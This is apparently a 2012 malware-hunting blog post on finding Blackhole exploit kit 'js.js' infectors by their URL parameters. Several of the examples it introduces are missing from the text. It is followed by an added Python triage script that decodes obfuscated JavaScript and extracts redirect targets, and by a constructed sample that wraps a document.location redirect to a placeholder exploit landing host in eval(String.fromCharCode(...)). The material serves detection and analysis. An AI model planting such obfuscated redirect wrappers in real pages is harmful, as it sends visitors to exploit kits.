Understanding Recent Blackhole Exploit Kit's "js.js" Infector Trend for Smart Hunting
01 Sep 2012
When I hunt through the honeypot Blackhole exploit kit (BHEK) blacklist
for infections, I often see URLs ending in js.js.
The file extension is always the same, but the contents differ
depending on the malware epidemic being exploited, i.e. how the BHEK wants to
infect users at that time.
Previously, the trend I found in the js.js code was a plain and
common injected obfuscation script like:
↑It was obvious that we had to crack this code to get to the next
hop of the malware source.
another text file contains the "document.location=" of a certain Blackhole site.
The moral of this writing is that we can nail bigger things, even a new epidemic, by
understanding the parameters produced in the current trend.
Allow me to demonstrate this theory. Let's look at the real infected URLs below:
This connects you to the "document.location=" shown below:
The lesson teaches us to understand the current trend in the parameter used by
Blackhole, which is:
Let's prove this theory by searching for the above strings on the
malware domain list site:
↑Voila! We got ourselves a new hunting field. :-)
PS: This post is dedicated to fellow malware hunters.
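To make the hunting workflow above concrete, here is an added example that is not code from the original post: a small Python triage script that flags the injected wrapper primitives in a captured js.js body, decodes a String.fromCharCode / unescape layer, pulls out the document.location target and reduces it to the host-independent path-and-parameter string you would then search for in a malware domain list. The sample js.js body and the `bhek-landing.example` hostname are constructed for the demo and are not indicators from the post.

```python
"""Triage helper for a captured Blackhole (BHEK) "js.js" infector body.

Added example, not code from the original post. It assumes the js.js
content has already been fetched (e.g. from a honeypot) and is handed
over as a string; every sample below is constructed and the hostname is
a placeholder.
"""
import re
from urllib.parse import unquote, urlparse

# Obfuscation primitives the post describes as the injected wrapper.
INDICATORS = ("eval(", "unescape(", "String.fromCharCode", "document.write(")

# Redirect forms that hand the victim to the landing page.
REDIRECT_RE = re.compile(
    r"(?:document|window)\.location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]"
)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")
UNESCAPE_RE = re.compile(r"unescape\(\s*['\"]([^'\"]+)['\"]\s*\)")


def obfuscation_indicators(js):
    """Return the wrapper primitives present in the script body, in INDICATORS order."""
    return [tok for tok in INDICATORS if tok in js]


def deobfuscate(js):
    """One decoding pass: expand String.fromCharCode(...) and unescape('...')."""
    js = FROMCHARCODE_RE.sub(
        lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()),
        js,
    )
    js = UNESCAPE_RE.sub(lambda m: unquote(m.group(1)), js)
    return js


def extract_redirects(js):
    """Collect document.location / window.location targets from decoded code."""
    return REDIRECT_RE.findall(js)


def hunting_string(url):
    """Reduce a landing URL to the part worth searching in a domain list:
    path plus parameter names, with host and values dropped, because the kit
    rotates domains and parameter values far more often than its URL layout."""
    parsed = urlparse(url)
    path = parsed.path.lstrip("/")
    keys = [kv.split("=", 1)[0] for kv in parsed.query.split("&") if kv]
    if not keys:
        return path
    return path + "?" + "&".join(k + "=" for k in keys)


def triage(js, max_passes=3):
    """Full chain: flag the wrapper, decode up to max_passes layers,
    pull redirect targets and derive the hunting strings."""
    indicators = obfuscation_indicators(js)
    decoded = js
    for _ in range(max_passes):
        nxt = deobfuscate(decoded)
        if nxt == decoded:  # nothing left to decode
            break
        decoded = nxt
    redirects = extract_redirects(decoded)
    return {
        "indicators": indicators,
        "redirects": redirects,
        "hunting_strings": sorted({hunting_string(u) for u in redirects}),
    }


# Constructed sample: a redirect stage wrapped in the kind of
# eval(String.fromCharCode(...)) wrapper the post describes; placeholder host.
STAGE2 = "document.location='http://bhek-landing.example/main.php?page=0123abcd';"
SAMPLE_JS_JS = (
    "document.write(unescape('%3Cscript%3E'));\n"
    "eval(String.fromCharCode("
    + ",".join(str(ord(c)) for c in STAGE2)
    + "));\n"
)

if __name__ == "__main__":
    for key, value in triage(SAMPLE_JS_JS).items():
        print(key, value)
```

The hunting string is deliberately host-free: the post's point is that the domain changes constantly while the parameter layout is the stable trend, so that is what you feed into the malware domain list search.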